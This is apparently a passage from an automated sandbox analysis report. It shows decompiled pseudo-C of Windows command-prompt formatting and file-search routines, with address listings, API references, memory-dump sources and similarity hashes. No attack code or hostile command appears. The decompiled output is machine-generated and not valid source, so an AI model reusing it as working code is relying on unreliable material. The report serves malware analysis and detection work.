								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}





































































                                              0x002a85ea
                                              0x002a85f5
                                              0x002a85fc
                                              0x002a8607
                                              0x002a860c
                                              0x002a860e
                                              0x002a8617
                                              0x002a861a
                                              0x002a861c
                                              0x002a8620
                                              0x002a8626
                                              0x002a862c
                                              0x002a8639
                                              0x002a8655
                                              0x002a8882
                                              0x00000000
                                              0x002a865b
                                              0x002a865b
                                              0x002a8661
                                              0x002a8663
                                              0x002a8666
                                              0x002a8666
                                              0x002a8669
                                              0x002a866c
                                              0x002a8671
                                              0x002a8673
                                              0x002a8675
                                              0x002c03bb
                                              0x002a8859
                                              0x002a885c
                                              0x002a8875
                                              0x002a8875
                                              0x002a8683
                                              0x002a8850
                                              0x002a8857
                                              0x00000000
                                              0x002a8857
                                              0x002a8691
                                              0x002a869a
                                              0x002c03c7
                                              0x002c03c8
                                              0x002c03ca
                                              0x002c03d0
                                              0x002a86a0
                                              0x002a86a1
                                              0x002a86a7
                                              0x002a86ad
                                              0x002a86ad
                                              0x002a86b5
                                              0x00000000
                                              0x002a86bb
                                              0x002a86c0
                                              0x002c03db
                                              0x002c03e1
                                              0x00000000
                                              0x00000000
                                              0x002c03e7
                                              0x002a86cd
                                              0x002a86d2
                                              0x002a86da
                                              0x002a86ec
                                              0x002a86f1
                                              0x002a86f1
                                              0x002a86fd
                                              0x002a8702
                                              0x002a8707
                                              0x002c03ec
                                              0x002c03ec
                                              0x002a8715
                                              0x002a871b
                                              0x002a8724
                                              0x00000000
                                              0x002a872a
                                              0x002a872a
                                              0x002a872a
                                              0x002a872a
                                              0x002a8730
                                              0x00000000
                                              0x00000000
                                              0x002a8736
                                              0x002a873c
                                              0x002a873e
                                              0x002a8741
                                              0x002a8741
                                              0x002a8744
                                              0x002a8747
                                              0x002a874c
                                              0x002a874e
                                              0x002a8750
                                              0x002a876c
                                              0x002a8774
                                              0x002c0615
                                              0x002c061b
                                              0x002c0624
                                              0x002c0626
                                              0x002a883b
                                              0x002a8842
                                              0x002a8848
                                              0x002a884e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a884e
                                              0x002a877a
                                              0x002a877f
                                              0x002c03f7
                                              0x002c03f7
                                              0x002a878e
                                              0x002a8793
                                              0x002a879c
                                              0x002c047a
                                              0x002c047d
                                              0x002c047f
                                              0x002c0482
                                              0x002c0484
                                              0x002c0486
                                              0x002c0486
                                              0x002c048e
                                              0x002c048e
                                              0x002c0493
                                              0x002c0493
                                              0x002c0499
                                              0x002c049c
                                              0x002c049e
                                              0x002c04a0
                                              0x002c04a0
                                              0x002c04a6
                                              0x002c04a8
                                              0x002c04ad
                                              0x002c04af
                                              0x00000000
                                              0x002c04b5
                                              0x002c04b5
                                              0x002c04ba
                                              0x00000000
                                              0x00000000
                                              0x002c04c0
                                              0x002c04c3
                                              0x002c04c5
                                              0x002c04c8
                                              0x002c04ca
                                              0x002c04cc
                                              0x002c04cc
                                              0x002c04da
                                              0x002c04e0
                                              0x002c04e3
                                              0x002c04e5
                                              0x002c04e7
                                              0x002c04ea
                                              0x002c04ec
                                              0x002c04ee
                                              0x002c04ee
                                              0x002c04f8
                                              0x002c04fe
                                              0x002c0503
                                              0x002c0507
                                              0x002c0507
                                              0x002c0503
                                              0x002c04e5
                                              0x002c050d
                                              0x002c0513
                                              0x002c0516
                                              0x002c0516
                                              0x002c0519
                                              0x002c051c
                                              0x002c051c
                                              0x002c0521
                                              0x002c0524
                                              0x002c0524
                                              0x002c0526
                                              0x002c0528
                                              0x002c0571
                                              0x002c0571
                                              0x002c0573
                                              0x002c0575
                                              0x002c0575
                                              0x002c0583
                                              0x002c0588
                                              0x002c058b
                                              0x002c058b
                                              0x002c0592
                                              0x002c0593
                                              0x002c0598
                                              0x002c059d
                                              0x002c059f
                                              0x002c05a1
                                              0x002c05a1
                                              0x002c05a9
                                              0x002c05b5
                                              0x00000000
                                              0x002c05b5
                                              0x002c052a
                                              0x002c052c
                                              0x002c052e
                                              0x002c052e
                                              0x002c0534
                                              0x002c0536
                                              0x002c053a
                                              0x002c0540
                                              0x002c0543
                                              0x002c0543
                                              0x002c0546
                                              0x002c0549
                                              0x002c0549
                                              0x002c0550
                                              0x002c0555
                                              0x002c055b
                                              0x002c0560
                                              0x002c05c3
                                              0x002c05c8
                                              0x002c05cb
                                              0x002c05cd
                                              0x002c05cf
                                              0x002c05cf
                                              0x002c05dd
                                              0x002c05e2
                                              0x002c05e5
                                              0x002c05e8
                                              0x002c05ea
                                              0x002c05ec
                                              0x002c05ec
                                              0x002c05f4
                                              0x002c05ff
                                              0x002c0605
                                              0x00000000
                                              0x002c0605
                                              0x002c0569
                                              0x002c056e
                                              0x00000000
                                              0x002c056e
                                              0x002a87a2
                                              0x002a87a4
                                              0x002a87a9
                                              0x002a87af
                                              0x002a87b0
                                              0x002a87b0
                                              0x002a87b6
                                              0x00000000
                                              0x00000000
                                              0x002a87bf
                                              0x002a87d8
                                              0x002a87d8
                                              0x002a87da
                                              0x002a87dc
                                              0x002a881a
                                              0x002a882f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a882f
                                              0x002a87de
                                              0x002a87e3
                                              0x002a87e9
                                              0x002a87e9
                                              0x002a87ef
                                              0x00000000
                                              0x00000000
                                              0x002a87f4
                                              0x002a8809
                                              0x002a8809
                                              0x002a8812
                                              0x002a8814
                                              0x002c0402
                                              0x002c0405
                                              0x002c0407
                                              0x002c0409
                                              0x002c0409
                                              0x002c040f
                                              0x002c0415
                                              0x002c041a
                                              0x002c0420
                                              0x00000000
                                              0x002c0426
                                              0x002c0426
                                              0x002c0428
                                              0x00000000
                                              0x00000000
                                              0x002c042e
                                              0x002c0434
                                              0x002c0436
                                              0x002c043b
                                              0x002c0449
                                              0x002c0449
                                              0x002c044c
                                              0x002c044e
                                              0x002c0450
                                              0x002c0450
                                              0x002c045e
                                              0x002c0463
                                              0x002c0466
                                              0x002c046d
                                              0x002c046e
                                              0x00000000
                                              0x002c0474
                                              0x002c043d
                                              0x002c0443
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0443
                                              0x002c0420
                                              0x00000000
                                              0x002a8814
                                              0x002a87f6
                                              0x002a87fa
                                              0x002a87fe
                                              0x00000000
                                              0x00000000
                                              0x002a8800
                                              0x002a8802
                                              0x002a8807
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a8807
                                              0x002a880d
                                              0x002a880f
                                              0x002a880f
                                              0x00000000
                                              0x002a880f
                                              0x002a87c1
                                              0x002a87c5
                                              0x002a87c9
                                              0x00000000
                                              0x00000000
                                              0x002a87cf
                                              0x002a87d1
                                              0x002a87d6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a87d6
                                              0x002a8876
                                              0x002a8878
                                              0x00000000
                                              0x002a8878
                                              0x002a879c
                                              0x002a8752
                                              0x002a8758
                                              0x002a875a
                                              0x002a875d
                                              0x002a875d
                                              0x002a8760
                                              0x002a8763
                                              0x002a876a
                                              0x00000000
                                              0x002a876a
                                              0x002a8835
                                              0x002a8835
                                              0x00000000
                                              0x002a8835
                                              0x002a8724
                                              0x002a86b5

                                              APIs
                                              • memset.MSVCRT ref: 002A862C
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 002A8691
                                              • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 002A86A1
                                              • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,002A250C,?,?,?,-00000105), ref: 002A8715
                                              • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 002A8827
                                              • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 002A8842
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002A885C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Find$File$CloseFirstmemset$Next
                                              • String ID: \\?\
                                              • API String ID: 3059144641-4282027825
                                              • Opcode ID: c56a0abfdd15e78d9645c492cfdf4d0b62ffe39c5eb4d8a83334ec9f2d6e5b94
                                              • Instruction ID: ab18c9bb2d2a191f067493b45e8171ddf6f83397816e24aab0bd8c9119828580
                                              • Opcode Fuzzy Hash: c56a0abfdd15e78d9645c492cfdf4d0b62ffe39c5eb4d8a83334ec9f2d6e5b94
                                              • Instruction Fuzzy Hash: A4D1CF70A2011ACBDB24DF64DCC9FBA7379EF15304F9405A9EA09A7141EF349EA5CE50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C6FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 73%
                                              			E002C6FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0x2cc140);
				_push(E002B7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0x2cd0b4; // 0x40f69e4c
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0x2cd544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E002AC108(__ecx);
					EnterCriticalSection( *0x2d3858);
					 *0x2cd544 = 0;
					LeaveCriticalSection( *0x2d3858);
				}
				_t227 =  *0x2cd0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E002B6FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0x2cd5c8; // 0x0
					if(_t228 == 0) {
						E002B25D9(L"\r\n");
					}
					if( *0x2d7896 == 0) {
						_t200 = E002ACFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0x2e8110;
							E002B1040(0x2e8110, 0x200, _t200);
							 *0x2d7896 = 1;
						}
					} else {
						_v660 = 0x2e8110;
					}
					_t160 =  *0x2e3cb8;
					if( *0x2e3cb8 == 0) {
						_t160 = 0x2e3ab0;
					}
					_t182 =  *0x2e3cc0;
					E002B36CB(_t153, _t160,  *0x2e3cc0, 0);
					_t113 = E002C6FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0x2e3cb8;
							if( *0x2e3cb8 == 0) {
								_t117 = 0x2e3ab0;
							}
							_t202 = _v676;
							E002B274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E002B2616(_t203, _t184 - _t211 >> 1);
							if( *0x2cd544 != 0) {
								EnterCriticalSection( *0x2d3858);
								 *0x2cd544 =  *0x2cd544 & 0x00000000;
								LeaveCriticalSection( *0x2d3858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0x2a3b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0x2a3b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0x2a3b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0x2a3b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0x2e3cb8;
											if( *0x2e3cb8 == 0) {
												_t127 = 0x2e3ab0;
											}
											E002B274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M002C7698))) {
											case 0:
												_t132 = E002A96A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E002A5AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0x2e3cb8;
												if( *0x2e3cb8 == 0) {
													__eax = 0x2e3ab0;
												}
												__eax = E002B274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E002A443C(__ecx) =  &_v124;
												__esi = E002AB3FC(__ecx, 0x2350,  &_v124);
												E002B274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0x2a3948;
												if(_v672 == 0) {
													__eax = 0x2a3958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E002B1040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E002B1040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0x2e3cc9 == 0) {
													goto L85;
												}
												__ecx =  *0x2e3ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0x2e3cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0x2e3cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0x2e3ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0x2e3ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E002B7797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0x2ec028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E002B274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E002B274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
													goto L83;
												}
										}
									}
									_t41 = _t125 + 0x2a3b94; // 0x450000
									E002B274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E002B274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E002A68B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E002C7AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}






































































                                              0x002c6ff3
                                              0x002c6ff5
                                              0x002c6ff6
                                              0x002c6ffa
                                              0x002c7001
                                              0x002c7005
                                              0x002c7007
                                              0x002c7009
                                              0x002c700e
                                              0x002c7019
                                              0x002c701a
                                              0x002c701b
                                              0x002c701c
                                              0x002c701d
                                              0x002c7023
                                              0x002c7028
                                              0x002c702b
                                              0x002c702d
                                              0x002c7032
                                              0x002c7033
                                              0x002c7036
                                              0x002c703c
                                              0x002c7041
                                              0x002c7047
                                              0x002c704d
                                              0x002c704f
                                              0x002c7050
                                              0x002c7055
                                              0x002c7062
                                              0x002c7068
                                              0x002c7074
                                              0x002c7074
                                              0x002c707a
                                              0x002c7080
                                              0x002c7678
                                              0x002c767b
                                              0x002c7683
                                              0x002c7684
                                              0x002c7695
                                              0x002c7086
                                              0x002c7086
                                              0x002c708c
                                              0x002c7093
                                              0x002c7098
                                              0x002c70a0
                                              0x002c70b9
                                              0x002c70bb
                                              0x002c70c3
                                              0x002c70d0
                                              0x002c70d8
                                              0x002c70dd
                                              0x002c70dd
                                              0x002c70a2
                                              0x002c70a7
                                              0x002c70a7
                                              0x002c70e4
                                              0x002c70ec
                                              0x002c70ee
                                              0x002c70ee
                                              0x002c70f4
                                              0x002c70fa
                                              0x002c7105
                                              0x002c710a
                                              0x002c7112
                                              0x00000000
                                              0x002c7118
                                              0x002c7118
                                              0x002c711a
                                              0x002c7122
                                              0x002c712b
                                              0x002c712c
                                              0x002c7132
                                              0x002c713a
                                              0x002c75eb
                                              0x002c75eb
                                              0x002c75f2
                                              0x002c75f4
                                              0x002c75f4
                                              0x002c7600
                                              0x002c7607
                                              0x002c760f
                                              0x002c7611
                                              0x002c7611
                                              0x002c7616
                                              0x002c7616
                                              0x002c7619
                                              0x002c761c
                                              0x002c7625
                                              0x002c7628
                                              0x002c7628
                                              0x002c762a
                                              0x002c762c
                                              0x002c762f
                                              0x002c7635
                                              0x002c7637
                                              0x002c7637
                                              0x002c763a
                                              0x002c763a
                                              0x002c763d
                                              0x002c7640
                                              0x002c7647
                                              0x002c764b
                                              0x002c7657
                                              0x002c765f
                                              0x002c7665
                                              0x002c7672
                                              0x002c7672
                                              0x00000000
                                              0x002c7657
                                              0x002c7140
                                              0x002c7146
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c714c
                                              0x002c7159
                                              0x002c71ed
                                              0x002c71f0
                                              0x002c71f6
                                              0x002c71fe
                                              0x002c7200
                                              0x002c720a
                                              0x002c7220
                                              0x002c7224
                                              0x002c7224
                                              0x002c722a
                                              0x002c7230
                                              0x002c7235
                                              0x00000000
                                              0x00000000
                                              0x002c723b
                                              0x002c723b
                                              0x002c7245
                                              0x002c724b
                                              0x002c7251
                                              0x00000000
                                              0x00000000
                                              0x002c7257
                                              0x002c7257
                                              0x002c7261
                                              0x002c729d
                                              0x002c729d
                                              0x002c72a3
                                              0x002c7582
                                              0x002c7582
                                              0x002c7589
                                              0x002c758b
                                              0x002c758b
                                              0x002c759b
                                              0x002c75a0
                                              0x002c75a3
                                              0x002c75a8
                                              0x002c75b0
                                              0x002c75b0
                                              0x002c75b3
                                              0x002c75b6
                                              0x002c75bb
                                              0x002c75c1
                                              0x002c75c1
                                              0x002c75c3
                                              0x002c75c5
                                              0x002c75c8
                                              0x002c75c8
                                              0x002c75ce
                                              0x002c75d4
                                              0x002c75da
                                              0x002c75dd
                                              0x002c75e3
                                              0x00000000
                                              0x002c75e3
                                              0x002c72a9
                                              0x00000000
                                              0x002c72b7
                                              0x00000000
                                              0x00000000
                                              0x002c72c8
                                              0x002c72ca
                                              0x002c72cb
                                              0x002c72cd
                                              0x002c72bc
                                              0x002c72bc
                                              0x002c72bf
                                              0x00000000
                                              0x00000000
                                              0x002c72d4
                                              0x002c72db
                                              0x002c72dd
                                              0x002c72dd
                                              0x002c72ea
                                              0x002c72f2
                                              0x002c72f4
                                              0x002c72f7
                                              0x002c72fd
                                              0x002c72ff
                                              0x002c72ff
                                              0x002c7302
                                              0x002c7305
                                              0x002c730a
                                              0x00000000
                                              0x00000000
                                              0x002c7315
                                              0x002c731d
                                              0x002c732b
                                              0x002c7343
                                              0x002c7349
                                              0x002c734b
                                              0x002c734e
                                              0x002c7350
                                              0x002c7350
                                              0x002c7353
                                              0x002c7356
                                              0x002c735b
                                              0x002c735d
                                              0x00000000
                                              0x00000000
                                              0x002c7370
                                              0x002c7375
                                              0x002c7377
                                              0x002c7377
                                              0x002c737d
                                              0x002c737f
                                              0x002c7381
                                              0x002c7386
                                              0x002c7388
                                              0x002c738b
                                              0x002c7391
                                              0x002c7393
                                              0x002c7393
                                              0x002c7396
                                              0x002c7399
                                              0x002c739e
                                              0x00000000
                                              0x00000000
                                              0x002c73ae
                                              0x002c73b0
                                              0x002c73b2
                                              0x002c73b7
                                              0x002c73b9
                                              0x002c73bc
                                              0x002c73c2
                                              0x002c73c4
                                              0x002c73c4
                                              0x002c73c7
                                              0x002c73ca
                                              0x002c73cf
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c73e1
                                              0x00000000
                                              0x00000000
                                              0x002c73e7
                                              0x002c7410
                                              0x002c73ef
                                              0x002c73f1
                                              0x002c73f4
                                              0x00000000
                                              0x00000000
                                              0x002c73fa
                                              0x002c73fc
                                              0x002c73fd
                                              0x002c7400
                                              0x002c7403
                                              0x002c7409
                                              0x002c740a
                                              0x002c740a
                                              0x00000000
                                              0x00000000
                                              0x002c7421
                                              0x00000000
                                              0x00000000
                                              0x002c7427
                                              0x002c742d
                                              0x002c7435
                                              0x002c7437
                                              0x002c7439
                                              0x002c7439
                                              0x002c743e
                                              0x002c7441
                                              0x002c7447
                                              0x002c7449
                                              0x002c7449
                                              0x002c744e
                                              0x002c7452
                                              0x002c7456
                                              0x002c7458
                                              0x002c7459
                                              0x002c745d
                                              0x002c745f
                                              0x002c7463
                                              0x002c7470
                                              0x00000000
                                              0x002c7476
                                              0x002c7476
                                              0x002c7478
                                              0x002c747c
                                              0x002c7486
                                              0x002c7489
                                              0x002c7490
                                              0x002c74b2
                                              0x002c7492
                                              0x002c7492
                                              0x002c7498
                                              0x002c7499
                                              0x002c749f
                                              0x002c74a0
                                              0x002c74a3
                                              0x002c74a4
                                              0x002c74aa
                                              0x002c74aa
                                              0x002c74bc
                                              0x002c750b
                                              0x002c755a
                                              0x002c7562
                                              0x002c7564
                                              0x002c7567
                                              0x002c756d
                                              0x002c756f
                                              0x002c756f
                                              0x002c7572
                                              0x002c7575
                                              0x002c757a
                                              0x002c750d
                                              0x002c7517
                                              0x00000000
                                              0x00000000
                                              0x002c751d
                                              0x002c7522
                                              0x002c7523
                                              0x002c7524
                                              0x002c7529
                                              0x002c752c
                                              0x002c752e
                                              0x002c7531
                                              0x002c7537
                                              0x002c7539
                                              0x002c7539
                                              0x002c753c
                                              0x002c753f
                                              0x002c7544
                                              0x002c7544
                                              0x00000000
                                              0x002c750b
                                              0x00000000
                                              0x002c72a9
                                              0x002c7263
                                              0x002c7272
                                              0x002c7277
                                              0x002c727a
                                              0x002c727f
                                              0x002c7287
                                              0x002c7287
                                              0x002c728a
                                              0x002c728d
                                              0x002c7292
                                              0x00000000
                                              0x002c7292
                                              0x002c7239
                                              0x00000000
                                              0x002c7239
                                              0x002c716a
                                              0x002c716f
                                              0x002c7172
                                              0x002c7174
                                              0x002c7177
                                              0x002c717d
                                              0x002c717f
                                              0x002c717f
                                              0x002c7182
                                              0x002c7185
                                              0x002c7190
                                              0x002c7192
                                              0x002c7195
                                              0x002c719b
                                              0x002c719d
                                              0x002c71aa
                                              0x002c71dc
                                              0x002c71dc
                                              0x00000000
                                              0x002c71dc
                                              0x002c71b5
                                              0x002c71c4
                                              0x002c71da
                                              0x00000000
                                              0x002c71da
                                              0x002c71cf
                                              0x00000000
                                              0x002c71cf
                                              0x00000000
                                              0x002c714c
                                              0x002c7112

                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(40F69E4C,?,00000000), ref: 002C7062
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C7074
                                                • Part of subcall function 002ACFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,002CF830,00002000,?,?,?,?,?,002B373A,002A590A,00000000), ref: 002ACFDF
                                              • towupper.MSVCRT ref: 002C720E
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 002C7343
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,002A1EB4,002A3958), ref: 002C7467
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,40F69E4C,?,00000000), ref: 002C765F
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002C7672
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
